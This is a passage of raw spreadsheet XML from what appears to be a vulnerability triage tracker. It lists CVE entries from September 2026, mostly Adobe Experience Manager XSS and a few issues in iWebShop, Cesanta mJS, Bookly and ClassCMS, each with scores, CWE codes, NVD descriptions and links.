t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86666</t></is></c></row><row r="1336"><c r="A1336" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1336" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1336" s="5" t="inlineStr"><is><t>CVE-2026-86669</t></is></c><c r="D1336" s="5" t="n"><v>5.5</v></c><c r="E1336" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1336" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1336" s="5" t="inlineStr" /><c r="H1336" s="5" t="n"><v>0.004</v></c><c r="I1336" s="5" t="inlineStr" /><c r="J1336" s="5" t="inlineStr" /><c r="K1336" s="5" t="inlineStr" /><c r="L1336" s="5" t="inlineStr" /><c r="M1336" s="5" t="inlineStr" /><c r="N1336" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1336" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1336" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1336" s="5" t="inlineStr" /><c r="R1336" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S1336" s="5" t="inlineStr"><is><t>A vulnerability was detected in aircheng-org iWebShop-5 up to 5.15. This affects the function Login of the file controllers/systemseller.php. Performing a manipulation of the argument Name results in improper authentication. It is possible to initiate the attack remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="T1336" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86669</t></is></c></row><row r="1337"><c r="A1337" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1337" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1337" s="5" t="inlineStr"><is><t>CVE-2026-86672</t></is></c><c r="D1337" s="5" t="n"><v>5.5</v></c><c r="E1337" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1337" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1337" s="5" t="inlineStr" /><c r="H1337" s="5" t="n"><v>0.003</v></c><c r="I1337" s="5" t="inlineStr" /><c r="J1337" s="5" t="inlineStr" /><c r="K1337" s="5" t="inlineStr" /><c r="L1337" s="5" t="inlineStr" /><c r="M1337" s="5" t="inlineStr" /><c r="N1337" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1337" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1337" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1337" s="5" t="inlineStr" /><c r="R1337" s="5" t="inlineStr"><is><t>CWE-200, CWE-284</t></is></c><c r="S1337" s="5" t="inlineStr"><is><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is></c><c r="T1337" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86672</t></is></c></row><row r="1338"><c r="A1338" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1338" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1338" s="5" t="inlineStr"><is><t>CVE-2026-86673</t></is></c><c r="D1338" s="5" t="n"><v>5.5</v></c><c r="E1338" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1338" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1338" s="5" t="inlineStr" /><c r="H1338" s="5" t="n"><v>0.003</v></c><c r="I1338" s="5" t="inlineStr" /><c r="J1338" s="5" t="inlineStr"><is><t>mysql</t></is></c><c r="K1338" s="5" t="inlineStr" /><c r="L1338" s="5" t="inlineStr" /><c r="M1338" s="5" t="inlineStr" /><c r="N1338" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1338" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1338" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1338" s="5" t="inlineStr" /><c r="R1338" s="5" t="inlineStr"><is><t>CWE-259, CWE-798</t></is></c><c r="S1338" s="5" t="inlineStr"><is><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is></c><c r="T1338" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86673</t></is></c></row><row r="1339"><c r="A1339" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1339" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1339" s="5" t="inlineStr"><is><t>CVE-2026-86716</t></is></c><c r="D1339" s="5" t="n"><v>5.5</v></c><c r="E1339" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1339" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1339" s="5" t="inlineStr" /><c r="H1339" s="5" t="n"><v>0.003</v></c><c r="I1339" s="5" t="inlineStr" /><c r="J1339" s="5" t="inlineStr" /><c r="K1339" s="5" t="inlineStr" /><c r="L1339" s="5" t="inlineStr" /><c r="M1339" s="5" t="inlineStr" /><c r="N1339" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1339" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1339" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1339" s="5" t="inlineStr" /><c r="R1339" s="5" t="inlineStr"><is><t>CWE-119, CWE-122</t></is></c><c r="S1339" s="5" t="inlineStr"><is><t>A vulnerability was determined in Cesanta mJS up to 1.26. Affected is the function skip_spaces_and_comments of the file src/mjs_tok.c. Executing a manipulation can lead to heap-based buffer overflow. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="T1339" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86716</t></is></c></row><row r="1340"><c r="A1340" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1340" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1340" s="5" t="inlineStr"><is><t>CVE-2026-86808</t></is></c><c r="D1340" s="5" t="n"><v>5.5</v></c><c r="E1340" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1340" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1340" s="5" t="inlineStr" /><c r="H1340" s="5" t="n"><v>0.006</v></c><c r="I1340" s="5" t="inlineStr" /><c r="J1340" s="5" t="inlineStr" /><c r="K1340" s="5" t="inlineStr" /><c r="L1340" s="5" t="inlineStr" /><c r="M1340" s="5" t="inlineStr" /><c r="N1340" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1340" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1340" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1340" s="5" t="inlineStr" /><c r="R1340" s="5" t="inlineStr"><is><t>CWE-287, CWE-306</t></is></c><c r="S1340" s="5" t="inlineStr"><is><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is></c><c r="T1340" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86808</t></is></c></row><row r="1341"><c r="A1341" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1341" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1341" s="5" t="inlineStr"><is><t>CVE-2025-64542</t></is></c><c r="D1341" s="5" t="n"><v>5.4</v></c><c r="E1341" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1341" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1341" s="5" t="inlineStr" /><c r="H1341" s="5" t="n"><v>0.003</v></c><c r="I1341" s="5" t="inlineStr" /><c r="J1341" s="5" t="inlineStr" /><c r="K1341" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1341" s="5" t="inlineStr" /><c r="M1341" s="5" t="inlineStr" /><c r="N1341" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1341" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1341" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1341" s="5" t="inlineStr" /><c r="R1341" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S134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41" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64542</t></is></c></row><row r="1342"><c r="A1342" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1342" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1342" s="5" t="inlineStr"><is><t>CVE-2025-64584</t></is></c><c r="D1342" s="5" t="n"><v>5.4</v></c><c r="E1342" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1342" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1342" s="5" t="inlineStr" /><c r="H1342" s="5" t="n"><v>0.003</v></c><c r="I1342" s="5" t="inlineStr" /><c r="J1342" s="5" t="inlineStr" /><c r="K1342" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1342" s="5" t="inlineStr" /><c r="M1342" s="5" t="inlineStr" /><c r="N1342" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1342" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1342" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1342" s="5" t="inlineStr" /><c r="R1342" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S134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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64584</t></is></c></row><row r="1343"><c r="A1343" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1343" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1343" s="5" t="inlineStr"><is><t>CVE-2025-64588</t></is></c><c r="D1343" s="5" t="n"><v>5.4</v></c><c r="E1343" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1343" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1343" s="5" t="inlineStr" /><c r="H1343" s="5" t="n"><v>0.003</v></c><c r="I1343" s="5" t="inlineStr" /><c r="J1343" s="5" t="inlineStr" /><c r="K1343" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1343" s="5" t="inlineStr" /><c r="M1343" s="5" t="inlineStr" /><c r="N1343" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1343" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1343" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1343" s="5" t="inlineStr" /><c r="R1343" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S134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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64588</t></is></c></row><row r="1344"><c r="A1344" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1344" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1344" s="5" t="inlineStr"><is><t>CVE-2025-64589</t></is></c><c r="D1344" s="5" t="n"><v>5.4</v></c><c r="E1344" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1344" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1344" s="5" t="inlineStr" /><c r="H1344" s="5" t="n"><v>0.003</v></c><c r="I1344" s="5" t="inlineStr" /><c r="J1344" s="5" t="inlineStr" /><c r="K1344" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1344" s="5" t="inlineStr" /><c r="M1344" s="5" t="inlineStr" /><c r="N1344" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1344" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1344" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1344" s="5" t="inlineStr" /><c r="R1344" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S134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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64589</t></is></c></row><row r="1345"><c r="A1345" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1345" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1345" s="5" t="inlineStr"><is><t>CVE-2025-64610</t></is></c><c r="D1345" s="5" t="n"><v>5.4</v></c><c r="E1345" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1345" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1345" s="5" t="inlineStr" /><c r="H1345" s="5" t="n"><v>0.003</v></c><c r="I1345" s="5" t="inlineStr" /><c r="J1345" s="5" t="inlineStr" /><c r="K1345" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1345" s="5" t="inlineStr" /><c r="M1345" s="5" t="inlineStr" /><c r="N1345" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1345" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1345" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1345" s="5" t="inlineStr" /><c r="R1345" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S134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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64610</t></is></c></row><row r="1346"><c r="A1346" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1346" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1346" s="5" t="inlineStr"><is><t>CVE-2025-64618</t></is></c><c r="D1346" s="5" t="n"><v>5.4</v></c><c r="E1346" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1346" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1346" s="5" t="inlineStr" /><c r="H1346" s="5" t="n"><v>0.003</v></c><c r="I1346" s="5" t="inlineStr" /><c r="J1346" s="5" t="inlineStr" /><c r="K1346" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1346" s="5" t="inlineStr" /><c r="M1346" s="5" t="inlineStr" /><c r="N1346" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1346" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1346" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1346" s="5" t="inlineStr" /><c r="R1346" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S134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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64618</t></is></c></row><row r="1347"><c r="A1347" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1347" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1347" s="5" t="inlineStr"><is><t>CVE-2025-64830</t></is></c><c r="D1347" s="5" t="n"><v>5.4</v></c><c r="E1347" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1347" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1347" s="5" t="inlineStr" /><c r="H1347" s="5" t="n"><v>0.003</v></c><c r="I1347" s="5" t="inlineStr" /><c r="J1347" s="5" t="inlineStr" /><c r="K1347" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1347" s="5" t="inlineStr" /><c r="M1347" s="5" t="inlineStr" /><c r="N1347" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1347" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1347" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1347" s="5" t="inlineStr" /><c r="R1347" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S134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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64830</t></is></c></row><row r="1348"><c r="A1348" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1348" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1348" s="5" t="inlineStr"><is><t>CVE-2025-64838</t></is></c><c r="D1348" s="5" t="n"><v>5.4</v></c><c r="E1348" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1348" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1348" s="5" t="inlineStr" /><c r="H1348" s="5" t="n"><v>0.003</v></c><c r="I1348" s="5" t="inlineStr" /><c r="J1348" s="5" t="inlineStr" /><c r="K1348" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1348" s="5" t="inlineStr" /><c r="M1348" s="5" t="inlineStr" /><c r="N1348" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1348" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1348" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1348" s="5" t="inlineStr" /><c r="R1348" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S134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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64838</t></is></c></row><row r="1349"><c r="A1349" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1349" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1349" s="5" t="inlineStr"><is><t>CVE-2025-64854</t></is></c><c r="D1349" s="5" t="n"><v>5.4</v></c><c r="E1349" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1349" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1349" s="5" t="inlineStr" /><c r="H1349" s="5" t="n"><v>0.003</v></c><c r="I1349" s="5" t="inlineStr" /><c r="J1349" s="5" t="inlineStr" /><c r="K1349" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1349" s="5" t="inlineStr" /><c r="M1349" s="5" t="inlineStr" /><c r="N1349" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1349" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1349" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1349" s="5" t="inlineStr" /><c r="R1349" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S134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9" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64854</t></is></c></row><row r="1350"><c r="A1350" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1350" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1350" s="5" t="inlineStr"><is><t>CVE-2025-64866</t></is></c><c r="D1350" s="5" t="n"><v>5.4</v></c><c r="E1350" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1350" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1350" s="5" t="inlineStr" /><c r="H1350" s="5" t="n"><v>0.003</v></c><c r="I1350" s="5" t="inlineStr" /><c r="J1350" s="5" t="inlineStr" /><c r="K1350" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1350" s="5" t="inlineStr" /><c r="M1350" s="5" t="inlineStr" /><c r="N1350" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1350" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1350" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1350" s="5" t="inlineStr" /><c r="R1350" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S135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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64866</t></is></c></row><row r="1351"><c r="A1351" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1351" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1351" s="5" t="inlineStr"><is><t>CVE-2025-64868</t></is></c><c r="D1351" s="5" t="n"><v>5.4</v></c><c r="E1351" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1351" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1351" s="5" t="inlineStr" /><c r="H1351" s="5" t="n"><v>0.003</v></c><c r="I1351" s="5" t="inlineStr" /><c r="J1351" s="5" t="inlineStr" /><c r="K1351" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1351" s="5" t="inlineStr" /><c r="M1351" s="5" t="inlineStr" /><c r="N1351" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1351" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1351" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1351" s="5" t="inlineStr" /><c r="R1351" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S135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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64868</t></is></c></row><row r="1352"><c r="A1352" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1352" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1352" s="5" t="inlineStr"><is><t>CVE-2026-19479</t></is></c><c r="D1352" s="5" t="n"><v>5.4</v></c><c r="E1352" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1352" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1352" s="5" t="inlineStr" /><c r="H1352" s="5" t="n"><v>0.003</v></c><c r="I1352" s="5" t="inlineStr" /><c r="J1352" s="5" t="inlineStr" /><c r="K1352" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1352" s="5" t="inlineStr" /><c r="M1352" s="5" t="inlineStr" /><c r="N1352" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1352" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1352" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1352" s="5" t="inlineStr" /><c r="R1352" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S135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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19479</t></is></c></row><row r="1353"><c r="A1353" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1353" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1353" s="5" t="inlineStr"><is><t>CVE-2026-19612</t></is></c><c r="D1353" s="5" t="n"><v>5.4</v></c><c r="E1353" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1353" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1353" s="5" t="inlineStr" /><c r="H1353" s="5" t="n"><v>0.003</v></c><c r="I1353" s="5" t="inlineStr" /><c r="J1353" s="5" t="inlineStr" /><c r="K1353" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1353" s="5" t="inlineStr" /><c r="M1353" s="5" t="inlineStr" /><c r="N1353" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1353" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1353" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1353" s="5" t="inlineStr" /><c r="R1353" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S135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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19612</t></is></c></row><row r="1354"><c r="A1354" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1354" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1354" s="5" t="inlineStr"><is><t>CVE-2026-19644</t></is></c><c r="D1354" s="5" t="n"><v>5.4</v></c><c r="E1354" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1354" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1354" s="5" t="inlineStr" /><c r="H1354" s="5" t="n"><v>0.003</v></c><c r="I1354" s="5" t="inlineStr" /><c r="J1354" s="5" t="inlineStr" /><c r="K1354" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1354" s="5" t="inlineStr" /><c r="M1354" s="5" t="inlineStr" /><c r="N1354" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1354" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1354" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1354" s="5" t="inlineStr" /><c r="R1354" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S135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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19644</t></is></c></row><row r="1355"><c r="A1355" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1355" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1355" s="5" t="inlineStr"><is><t>CVE-2026-19713</t></is></c><c r="D1355" s="5" t="n"><v>5.4</v></c><c r="E1355" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1355" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1355" s="5" t="inlineStr" /><c r="H1355" s="5" t="n"><v>0.003</v></c><c r="I1355" s="5" t="inlineStr" /><c r="J1355" s="5" t="inlineStr" /><c r="K1355" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1355" s="5" t="inlineStr" /><c r="M1355" s="5" t="inlineStr" /><c r="N1355" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1355" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1355" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1355" s="5" t="inlineStr" /><c r="R1355" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S135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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19713</t></is></c></row><row r="1356"><c r="A1356" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1356" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1356" s="5" t="inlineStr"><is><t>CVE-2026-2520</t></is></c><c r="D1356" s="5" t="n"><v>5.4</v></c><c r="E1356" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1356" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1356" s="5" t="inlineStr" /><c r="H1356" s="5" t="n"><v>0.002</v></c><c r="I1356" s="5" t="inlineStr" /><c r="J1356" s="5" t="inlineStr" /><c r="K1356" s="5" t="inlineStr" /><c r="L1356" s="5" t="inlineStr" /><c r="M1356" s="5" t="inlineStr" /><c r="N1356" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1356" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1356" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1356" s="5" t="inlineStr" /><c r="R1356" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1356" s="5" t="inlineStr"><is><t>The Online Scheduling and Appointment Booking System – Bookly plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'updateAddon' function in all versions up to, and including, 27.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update any plugin with a main file of 'main.php' to its latest version.</t></is></c><c r="T1356" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-2520</t></is></c></row><row r="1357"><c r="A1357" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1357" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1357" s="5" t="inlineStr"><is><t>CVE-2026-27227</t></is></c><c r="D1357" s="5" t="n"><v>5.4</v></c><c r="E1357" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1357" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1357" s="5" t="inlineStr" /><c r="H1357" s="5" t="n"><v>0.003</v></c><c r="I1357" s="5" t="inlineStr" /><c r="J1357" s="5" t="inlineStr" /><c r="K1357" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1357" s="5" t="inlineStr" /><c r="M1357" s="5" t="inlineStr" /><c r="N1357" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1357" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1357" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1357" s="5" t="inlineStr" /><c r="R1357" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S135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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-27227</t></is></c></row><row r="1358"><c r="A1358" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1358" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1358" s="5" t="inlineStr"><is><t>CVE-2026-52307</t></is></c><c r="D1358" s="5" t="n"><v>5.4</v></c><c r="E1358" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1358" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1358" s="5" t="inlineStr" /><c r="H1358" s="5" t="n"><v>0.003</v></c><c r="I1358" s="5" t="inlineStr" /><c r="J1358" s="5" t="inlineStr" /><c r="K1358" s="5" t="inlineStr" /><c r="L1358" s="5" t="inlineStr" /><c r="M1358" s="5" t="inlineStr" /><c r="N1358" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1358" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1358" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1358" s="5" t="inlineStr" /><c r="R1358" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1358" s="5" t="inlineStr"><is><t>An authenticated stored cross-site scripting (XSS) vulnerability in the Column Management component of ClassCMS 1CMS v5.6 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the title field.</t></is></c><c r="T1358" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-52307</t></is></c></row><row r="1359"><c r="A1359" s="5" 